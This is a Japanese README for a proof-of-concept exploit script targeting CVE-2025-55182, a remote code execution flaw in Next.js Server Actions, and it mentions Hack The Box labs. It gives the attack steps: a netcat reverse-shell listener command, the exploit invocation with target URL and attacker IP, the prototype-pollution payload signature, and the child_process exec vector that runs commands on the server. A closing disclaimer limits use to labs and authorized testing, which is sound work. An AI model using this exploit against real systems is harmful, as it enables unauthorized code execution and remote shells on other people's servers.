
Hack the Boxから来たのであれば、おそらくご存知でしょうが、もしそうなら、これは実際に動作します。
CVE-2025-55182 の概念実証(PoC)エクスプロイトです。Next.js Server Actions の認証不要のリモートコード実行(RCE)脆弱性を標的としています。
このエクスプロイトは、React Server Components(RSC)のマルチパートペイロードの逆シリアル化中にプロトタイプ汚染を悪用し、非同期・非ブロッキングの実行フローを使用して Node.js プロセスに悪意のあるコマンドを注入します。
execSync() API の代わりに child_process.exec() を使用し、コンテナノードでのスレッドハングを防止します。requests ライブラリのみで完全に構築されています。攻撃ホストでターミナルを開き、受信するリバース接続をキャッチするために netcat ソケットリスナーを起動します:
nc -lvnp 4444
ターゲットのベース URL、ローカルホストのインターフェース IP、希望するリスナーポートを指定します:
python3 exploit.py <target_url> <your_ip> [your_port]
python3 exploit.py http://website.whatever:port x.x.x.x 4444
このスクリプトは、必要な Next-Action ルーティングヘッダーを付けて、細工された生のマルチパートペイロードをアプリケーションのルーティングエンドポイントに直接送信します。
{"get":"$1:constructor:constructor"} によるオブジェクト構築シグネチャを活用することで、逆シリアライザエンジンがネイティブオブジェクトツリーを汚染します。付随するパラメータを処理する際、悪意を持って埋め込まれた _response コンテキストブロックを命令キューとして解釈し、実行中の Node サーバーユーザーコンテキストの権限でコード実行を可能にします。
// 基盤となるベクターターゲット:
process.mainModule.require('child_process').exec('your_payload_here');
このスクリプトは、教育目的、許可されたセキュリティテスト、および Hack The Box などのラボでの脆弱性フラグの取得のためにのみ作成されています。作者は、このユーティリティによって引き起こされる誤用、不正なシステム侵入、または損害について一切の責任を負いません。